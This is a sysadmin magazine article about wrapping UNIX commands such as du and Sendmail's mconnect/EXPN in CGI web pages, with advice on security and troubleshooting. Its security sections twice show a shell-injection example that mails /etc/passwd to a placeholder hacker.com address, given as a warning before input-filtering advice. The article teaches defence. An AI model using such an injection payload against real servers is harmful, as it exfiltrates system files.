Article

Webifying UNIX Commands

John Weeks

Intranet servers are often used to provide extensive work-related information to users within an organization. All too often, however, when these users encounter unknown situations, they call the support staff to assist them. Web pages generated through CGI scripts can provide a powerful portal to many utilities that systems administrators use on a regular basis, and can empower end users to resolve many of their own informational queries. This article provides an overview of the benefits, issues, and common errors surrounding Web interfaces for UNIX command line utilities. A Sendmail interface utility /usr/bin/mconnect is described in detail. This interface allows users to view all recipients of a group email alias on a mailhost, and link this information to other informational repositories about the mail recipients.

Architectural Overview

Web interfaces can be placed on individual infrastructure servers to resolve the basic set of queries and tasks associated with each service. Each infrastructure service has unique queries and tasks related to the particular service. Figure 1 illustrates a few CGI Web interfaces for tasks and queries associated with infrastructure services. Rather than a traditional use of CGI interfaces to provide interaction with databases on a Web site, these interfaces provide direct access to the status of infrastructure server's primary functions. This allows end users to resolve many basic problems and queries without help desk intervention and without requiring login access to critical UNIX infrastructure servers. This limited access keeps the servers cleaner and more secure while providing end users with the ability to easily retrieve information.

In addition to CGI interfaces for end users, the help desk may also have its own unpublished set of utilities to perform repetitive tasks such as checking backup logs or the mail queue, and general utilities such as checking the status of critical machines. CGI scripts can also easily be created to provide alternate access to frequently used command line queries such as: ps -ef | grep, df -k, cat /var/adm/messages, ifconfig -a, netstat -r, dmesg, and last. Special steps should be taken to ensure these Web interfaces could not be used to procure confidential information or perform undesired actions on your servers. Common security concerns are discussed in detail through- out the article.

Alternatives to Help Desk Informational Requests

Systems administrators repetitively receive the same basic tasks and information requests. Many of these requests are very trivial for systems administrators with technical experience and unrestricted access to most machines. In some cases, users may not be given general access to machines to perform the required tasks. In other cases, users may be dissuaded by cryptic UNIX command line utilities. Many NT users are accustomed to GUI interfaces providing them with the exact information they need and would rather leave the cryptic magic of UNIX commands to the magicians in the IT department.

Through the use of CGI Web interfaces, anyone can be given access to perform specific queries without carte blanche access to roam around a critical system. End users can be given an http link to follow to resolve their issue rather than being sent a complex set of UNIX commands and instructions. Ease of use, open access, and an immediate self-service response make CGI Web interfaces an outstanding alternative to submitting a help desk request.

Basics of CGI Web Interfaces

CGI scripts are less of a mystery than you might think. Most browsers allow you to see the HTML source of any Web page. For instance, from Netscape you can select “View -> Page Source” from the menu bar. HTML source is plain text that your browser interprets as instructions on how to display text and graphic images. CGI scripts generate HTML source code rather than the HTML source being stored as a static page on the Web server. This text is the same format as the HTML source code displayed from the browser. Because the HTML source is generated at the time the CGI script is called, it can provide real time information to your Web page (such as the current time) and allow you to provide information to customize the output. CGI scripts are commonly written in Perl, C, C++, or a shell programming language.

To illustrate how easily a CGI script is assembled, Listing 1 provides all that is required to generate the Web page shown in Figure 2. The first two echo lines are required to tell the browser it is about to receive HTML source code. Note that the second echo line (although simply a blank line) is absolutely required. If you omit this line, you will receive an “Error 500 - Internal Server Error” or “Error 500 - The Script Misbehaved”. (All listings for this article are available from: ftp.mfi.com in /pub/sysadmin or the Sys Admin Web site at: www.sysadminmag.com.)

The <PRE> and </PRE> tags signify that the enclosed text is pre-formatted. The browser displays the enclosed text with a fixed width font such that columns align properly and an end of line in the HTML source will return an end of line in the displayed text. The default action is normally to word wrap based on the size of the window. This is necessary for the output of many UNIX commands to ensure the output remains in legible columns.

Use of a few more of the HTML tags to maintain minimum style standards is recommended. This formatting, although often not required, includes tags such as <HTML>, <HEAD>, <TITLE>, and <BODY>. The next examples show how these tags might be included, as well as including a few more of the common building blocks of a CGI script.

du -- CGI Script to Recursively Find Largest File Systems

The /cgi-bin/du script in Listings 2 and 3 is made up of two parts, a Perl security wrapper and a traditional C shell script. The script takes a set of up to three directories as arguments and displays the file systems within these directories sorted by size. The output, as seen in Figure 3, is essentially that of:

du -sk /var/sadm | sort -nr
du -sk /var/spool | sort -nr

Passing Arguments to Interactive CGI Scripts

Arguments are passed to CGI scripts using several different methods. My favorite method for simple CGI interaction with command line utilities is to pass variables directly in the http address. For example:

http://sysadmin/cgi-bin/du?/export/home1+/export/home2+/export/home3

issues the same results as the following command:

/opt/httpd/cgi-bin/du /export/home1 /export/home2 /export/home3

This allows you to modify the arguments you specify directly in the “Location” field of your browser or within links and bookmarks.

A second option is to use the <ISINDEX> tag in the <HEADER> field. This method provides you with a text box to enter arguments that are then passed to the script in the manner mentioned above with minimal coding requirements. Some basic interpretation of special characters is performed for you, such as converting spaces separating arguments into “+”s and converting non-alphanumeric characters to their hex equivalents.

The <FORM> tag set provides a much more elegant method for submitting arguments to CGI scripts, which avoids misunderstandings associated with the text “This is a searchable index. Enter search keywords” (entered automatically by <ISINDEX>). Resources for FORM processing through CGI interfaces on the Web are vast and numerous. A good starting point for such repositories is:

http://www.cgi-resources.com/

Security Issues when Passing Variables

The unsecure_du script illustrates a couple of examples of how to pass arguments to your scripts. Passing arguments to your scripts creates a more interactive script, but allows hackers the potential to access your system. By passing an argument such as:

'"/export/home"; mailx foo@hacker.com < cat /etc/passwd'

an attacker could take advantage of an innocent line of coding such as echo $argv and turn it into:

`echo "/export/home"; mailx foo@hacker.com < cat /etc/passwd '

To avoid this type of situation, check remote user input before passing it to an executable and only accept characters required of the input. If you don't need it, don't accept it. Avoid meta-characters with special meaning such as:

;|*?‘'”\^~<>(){}[]$\n\r^M&$!

I use a wrapper similar to the one in Listing 2 to filter out undesired characters before they are executed by other shell commands. Note that directory names containing non-alphanumeric characters would be rejected by the /cgi-bin/du wrapper. Note also that unsecure_du is not stored in the cgi-bin directory to prevent it from being called directly.

Utilizing a commonly used security wrapper may open your site to hackers seeking to exploit holes in similar wrappers. I suggest adding a combination of security layers unique to your site to complicate situations for hackers familiar with a particular flaw. Many security measures are secure only until hackers find the right combination to the lock, at which time you don't want to have the same combination as everyone else. Other security issues will be discussed later in the article.

Adding Links to Additional Information

By adding links to the output of the du command, we can recursively traverse the file system to find large file structures much more quickly than we could from the command line. In this example, the links are added via the /usr/bin/awk command:

/usr/bin/awk '{printf("%-9s<A HREF=/cgi-bin/du?%s>%s</A>\n",$1,$2,$2)}'

which changes the first output line of the du command from:

1168   /var/sadm/pkg

to a hypertext link for /cgi-bin/du?/var/sadm/pkg:

1168 <A HREF="/cgi-bin/du?/var/sadm/pkg>/var/sadm/pkg</a>

Example /cgi-bin/mconnect Script

The /cgi-bin/mconnect Web interface has become an integral part of our email system, allowing users to view the recipients of hundreds of group aliases to ensure their messages go to the right audience. The basic method for gathering information using /usr/bin/mconnect is illustrated with a command line example in Figure 4.

The /usr/bin/mconnect command is really just a telnet to port 25 (the Sendmail port) on the specified host. The vrfy or expn command can be used once the telnet connection is established to verify that the address is valid on the server or to expand a group alias into the list of final recipients. vrfy and expn may be disabled on some mail servers, particularly those situated at a company's firewall.

A CGI interface to /usr/bin/mconnect is shown in Listings 4 and 5, and a sample output is shown in Figure 5. Most of the environmental information is provided within the script. Thus, the only information that needs to be provided to the Web page is an email alias, which can be typed into the <ISINDEX> text box at the top of the window or given as part of the http address, such as:

http://sysadmin/cgi-bin/mconnect?first_floor

Group email aliases may be evaluated through many forwarding and hierarchical aliases to the final mail recipient. For instance, the group alias bldg13_emps may be made up of several layers of aliases including bldg13_emps_1stflr, patricia.maidenname, and patti_marriedname before it resolves to a final recipient such as patti@mailhost.localcompany.com. This final resolution of all forwarding emails can be particularly helpful in determining which aliases an individual is included on when they registered to different group aliases with different forms of their email address.

Generating a Group Alias Resolution Database

To find which aliases include a specific individual, generate a database of all the email aliases. The generate_db function in Listing 5 can be used to generate such a database. Provide a list of all the aliases to check in a file /opt/sysadmin/alias_list. A sample file might include:

famous_presidents
abe.lincoln
alincoln

Derivation methods of such a list using NIS or /etc/mail/aliases are commented out in the generate_db function.

The script can expand 1000 aliases in about 8 minutes on a SparcStation10. The sleep 1 command is necessary to ensure the mailhost does not throttle repeated connections to the server, which may cause it to stop accepting connections from your client. Be sure to notify your postmaster before generating such a database, because their connection logs will show the server connections.

After collecting an initial database, the /cgi-bin/mconnect script can link to the /cgi-bin/aliases script shown in Listings 6 and 7 and Figure 6 to show all aliases in which an individual recipient is included. This combination allows users to ensure that they are on all the correct group aliases as others in their department.

Data Manipulation within /cgi-bin/mconnect

The eval_alias() function is used to change the output of /usr/bin/mconnect to a three-column, pipe-separated format of the type:

NAME|LOGIN|COMPANY

As an example based upon the output of /usr/bin/mconnect in Figure 4, the /usr/bin/sed command would take the output from:

(echo "expn famous_presidents";echo "quit") | /usr/bin/mconnect mailhost

deleting unneeded output and leaving the following lines:

250-Abraham Lincoln <alincoln@mailhost. localcompany.com>
250-John F. Kennedy <jfk@mailhost. localcompany.com>
250 George Washington <georgew@mailhost. localcompany.com>

that are then converted to the form:

Abraham Lincoln|alincoln|mailhost.localcompany.com
John F. Kennedy|jfk|mailhost.localcompany.com
George_Washington|georgew|mailhost.localcompany.com

In this example our local mailhost is set to mailhost.localcompany.com. Because this information would be repetitive, the COMPANY field is left empty:

Abraham Lincoln|alincoln|
John F. Kennedy|jfk|
George_Washington|georgew|

This output is then stored in the file:

MFILE=${MPATH}/ALIAS_DB/today/famous_presidents

This file is used to maintain a database of mail alias recipients to determine which aliases include specific users.

This information is then translated using awk from the form:

NAME|LOGIN|COMPANY

into a table consisting of two columns of the following format:

Included individuals:
<A HREF="/cgi-bin/aliases?LOGIN@COMPANY">LOGIN@COMPANY </A> NAME

and

Send mail to:
<A HREF="mailto: LOGIN@COMPANY">LOGIN@COMPANY</A>

allowing you to send mail to an individual recipient or to use the /cgi-bin/aliases script to see which other aliases a LOGIN is included in.

Data Manipulation within /cgi-bin/aliases

The /cgi-bin/aliases script will grep for LOGIN within the alias database for a list of GROUP_ALIAS's, (aliases that LOGIN is included within). Searching the alias database for LOGIN georgew would discover a GROUP_ALIAS list of:

famous_presidents
first_president
george.washington

The list of GROUP_ALIASes is displayed in a similar table to that of /cgi-bin/mconnect. The first column contains links to /cgi-bin/mconnect?GROUP_ALIAS allowing you to see what mail recipients are included on the GROUP_ALIAS. The second column allows you to send mail directly to one of the GROUP_ALIASes: Aliases included on:

<A HREF="/cgi-bin/mconnect?GROUP_ALIAS"> GROUP_ALIAS </A>

and

Send mail to:
<A HREF="mailto: GROUP_ALIAS "> GROUP_ALIAS </A>

This interaction between /cgi-bin/mconnect and /cgi-bin/aliases allows you to quickly traverse the complex hierarchies of group aliases. You can find all the aliases for a department even if you know only a single member of the department, find an individual based on his department, or ensure that you are on the correct aliases based upon which aliases include other users.

Figure 7 helps illustrate some of the complex relationships that can exist between a simple set of logins and aliases. The forwarding ALIAS_GROUP is shown to the right simply for readability and does not denote any special meaning.

Security Concerns with CGI

CGI scripts create dynamic and powerful portals to information but can also provide others with access to your critical servers. As we saw earlier allowing unrestricted user input permits others to execute commands on your Web server, such as:

http://sysadmin/cgi-bin/du?/export/home; mailx foo@hacker.com < cat \

  /etc/passwd

Check user input or you may be building your own Trojan horse for hackers to break inside your walls. CGI scripts accepting arguments can be easily manipulated by use of any number of meta-characters having special meanings to shells. Filter user input to ensure that only required characters are accepted as input.

Limit the access of your Web servers containing CGI scripts to those who absolutely need access to the information. An unsecured CGI script may be an open door for hackers looking for ways to break in to your servers. Use your firewall to restrict access from the Internet and check your Web server documentation for methods to restrict access from specific hosts and to require password access to sensitive information. Access Control Lists (ACLs) and .htaccess files are two of the most common ways to make it more difficult for hackers to access specific information. Don't make a utility available to the Internet that is only intended for use by your employees, especially if it contains confidential information.

Unsecure Web servers allow hackers to make changes to your /cgi-bin directory, which they can later use to access your servers freely. Once someone has accessed your system, there is no telling what they may leave behind as a simple method of return. CGI executable files should only be writable by root or a very secure account.

Access to files, directories, and executables is restricted to those of UID “nobody” by default. Do not assume that this means a hacker can not compromise your system as the user “nobody”. This makes an operation requiring root access such as shutdown more difficult, but still provides opportunity for a broad range of malicious attacks if caution is not used. Access as “nobody” allows hackers to gather a great deal of information that may be used to compromise your system (such as looking for old software with known security holes or compiling a list of valid logins).

To override the default UID by using setuid scripts or running the server as an alternate UID could give carte blanche access to your Web server as this alternate UID. The /cgi-bin/du script described earlier in the article would not be able to determine the file sizes of directories the UID “nobody” is unable to access. It may be tempting to run the Web server as UID root or /cgi-bin/du with a setuid of root. A hacker accessing your system and modifying /cgi-bin/du would then have unrestricted root access to your server. An alternate method in this case is to use a setuid binary executable, such as a copy of /usr/bin/du, which does not have the ability to modify the system, files, or initiate a shell.

CGI scripts, although providing a variety of methods for attacking a Web server, can in fact provide a more secure environment to your infrastructure servers. By providing the information users need through the Web, servers can be secured to a much greater extent. Users no longer need login access to infrastructure servers, and a jeopardized password does not mean infrastructure servers have been compromised. Fewer NT users may require direct login access to UNIX machines if the information they require is available through the Web. NT users without previous access to UNIX machines gain access to additional knowledge through the Web.

CGI Troubleshooting

Some common troubleshooting tips to keep in mind when trying to resolve problems with your CGI scripts include:

• CGI scripts are run as UID nobody by default. Run your scripts from the command line as the user 'nobody' to ensure you have the correct permissions and to view any errors directly.

• Check the Web server error logs for any error messages that may not appear in your browser.

• Don't forget that the first two output lines of your CGI script must be:

  echo 'Content-type: text/html'
  echo ''

The second output line is blank, but is absolutely critical to view information from a browser.

• If you are not sure where your error logs or /cgi-bin directory are located, try running ps -ef | grep http to get a hint of where the Web server files are located.

# ps -ef | grep http
  nobody  4932   162  0   Nov 19 ?       22:46 ./ns-httpd -d
/usr/netscape/https-www/config
    root 25054 25050  0 09:58:24 pts/3    0:00 grep http
  nobody   162     1  0   Nov 19 ?        0:01 ./ns-httpd -d
/usr/netscape/https-www/config

Additional information might also be found by greping for http in the start up files

# grep http /etc/rc*.d/*
/etc/rc0.d/K19netscape: /usr/netscape/https-www/start > /dev/console 2>&1
/etc/rc0.d/K19netscape: /usr/netscape/https-www/stop > /dev/console 2>&1
  
/etc/rc3.d/S19netscape: /usr/netscape/https-www/start > /dev/console 2>&1
/etc/rc3.d/S19netscape: /usr/netscape/https-www/stop > /dev/console 2>&1

In some instances, an HTTP server may be started from inetd as specified in the /etc/inetd.conf file.

# grep http /etc/inetd.conf
http    stream  tcp     nowait  nobody /usr/local/etc/httpd/httpd httpd

Look for conf files within the http directories describing how your server is configured.

# cd /usr/netscape/https-www/config
# ls
agent.conf            magnus.conf           obj.bak 
process.conf          webpub.conf
csid.conf             magnus.conf.clfilter  obj.conf 
rdm.conf              webpub.conf.clfilter
filter.conf           mime.types            obj.conf.clfilter 
robot.conf
# more magnus.conf
ServerRoot /usr/netscape/https-www
ServerID https-www
ServerName www.quintus.com
Port 80
ErrorLog /usr/netscape/https-www/logs/errors 
...
User nobody
#

Conclusions

CGI interfaces allow specific information to be viewed without providing general access to infrastructure servers. The “last” logs on our servers were previously plagued with people logging in to perform basic queries, and often the connections were left idle making it difficult to troubleshoot security issues and reboot servers. Now we are able to track what actions were performed on the servers because there is so little login access required.

NT users are provided with self-service information without complex instructions. Creating Web interfaces for many UNIX commands has reduced our help desk's most common calls, allowing our users to access the information they need with little training.

By hyper-linking the output of common command line information, our clients are able to drill down to the specific information needed. We have found that by being able to access information quickly and easily, our clients and help desk pursue the information they need more often and with greater completeness. The /cgi-bin/mconnect script became not just a tool to answer simple queries, but an integral part of our email system and greatly improved corporate communication and confidence in email because people knew they were communicating to the proper audience.

I hope that your users no longer need to wonder why they didn't get the email announcing the company lunch that everyone else received. And I also hope that many of you have been inspired by the wide possibilities for CGI Web interfaces and are eager to find expanded use for them at your own sites.

Additional Information

CGI FAQ's --
http://www.faqs.org/faqs/www/cgi-faq/preamble.html

Web Security --
http://www.w3.org/Security/Faq/www-security-faq.html

CGI Resources -- http://www.cgi-resources.com/

Peter Galvin's articles on securing Web servers are excellent, particularly The Solaris Security FAQ -- http://www.sunworld.com \
/common/swol-backissues-columns.html#security

Tom Christiansen's Idiots Guide to Solving PERL CGI Problems -- ftp://sunsite.ualberta.ca/pub/Mirror/CPAN/doc/FAQs \
/cgi/idiots-guide.html

About the Author

John Weeks has been working as a Senior UNIX Systems Administrator for 10 years, originally at Sun Microsystems and as a Web and NT Administrator over the past four years. Currently John is working at Quintus Corporation and can be reached at: john@weeksweb.com.